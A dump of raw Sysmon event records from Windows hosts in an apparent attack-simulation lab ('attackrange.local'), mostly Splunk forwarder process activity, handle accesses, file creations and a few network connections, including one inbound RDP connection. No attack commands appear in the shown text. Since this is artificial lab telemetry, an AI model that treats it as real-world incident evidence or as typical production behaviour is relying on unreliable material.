Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F7DE-60EB-DF7D-00000000CF01}10004C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054069Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:50.863{466BC892-F7DE-60EB-DF7D-00000000CF01}10004C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000001054068Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:50.762{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A2A803B783C51568041FB89B07BC5D19,SHA256=FBD759E885CA9E2CA1E974A49C87084558E28633260232F6EE2DC8F8E6F36642,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810034Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:50.605{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AA17D342B34E15C67877BF30895DBC19,SHA256=CC1F4D49567C5F372DA16B200686AEB0355CBA15BA89535D8C06BB5F967BD597,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810033Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:50.605{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=09C55E14A0A430A8B8C2BAAE90525151,SHA256=B502599980CA73ECCD6EFF90B5417EDE41A2D9799518139ED983A506991AEF56,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810032Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:48.806{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-30728-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 10341000x80000000000000001054067Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:50.439{466BC892-F7DE-60EB-DE7D-00000000CF01}95249492C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054066Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:50.177{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F7DE-60EB-DE7D-00000000CF01}9524C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054065Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:50.177{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054064Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:50.177{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054063Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:50.177{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054062Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:50.177{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054061Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:50.177{466BC892-02AD-60E8-0500-00000000CF01}408424C:\Windows\system32\csrss.exe{466BC892-F7DE-60EB-DE7D-00000000CF01}9524C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054060Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:50.161{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F7DE-60EB-DE7D-00000000CF01}9524C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054059Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:50.162{466BC892-F7DE-60EB-DE7D-00000000CF01}9524C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001054089Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:51.880{466BC892-F7DF-60EB-E07D-00000000CF01}3688120C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001054088Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:51.764{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE3B341466DD7DF83C7D9AB858360704,SHA256=10668A6B153771A7FE24DBD410A26C833AB369FA4F6B44CF8C0FE25E73DC511D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810036Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:49.742{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57438-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 10341000x80000000000000001054087Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:51.647{466BC892-32D3-60E8-770B-00000000CF01}63569904C:\Windows\Explorer.EXE{466BC892-F7DB-60EB-DC7D-00000000CF01}4252C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054086Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:51.547{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F7DF-60EB-E07D-00000000CF01}368C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054085Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:51.547{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054084Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:51.547{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054083Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:51.547{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054082Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:51.547{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054081Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:51.547{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F7DF-60EB-E07D-00000000CF01}368C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054080Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:51.547{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F7DF-60EB-E07D-00000000CF01}368C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001054079Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:51.541{466BC892-F7DF-60EB-E07D-00000000CF01}368C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x80000000000000001054078Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:43.119{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57438-false10.0.1.14win-dc-890.attackrange.local49676- 23542300x80000000000000001054077Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:51.163{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A3C603B8320AE7E1591B5BC52C6D7ADD,SHA256=D3C5415F2308CA681012F1D9A50ADF4C9576C1F59E29B850B70C4DA257525F61,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001054108Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:52.900{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F7E0-60EB-E27D-00000000CF01}9448C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054107Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:52.900{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054106Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:52.900{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001054105Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:52.900{466BC892-02AD-60E8-0500-00000000CF01}408476C:\Windows\system32\csrss.exe{466BC892-F7E0-60EB-E27D-00000000CF01}9448C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001054104Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 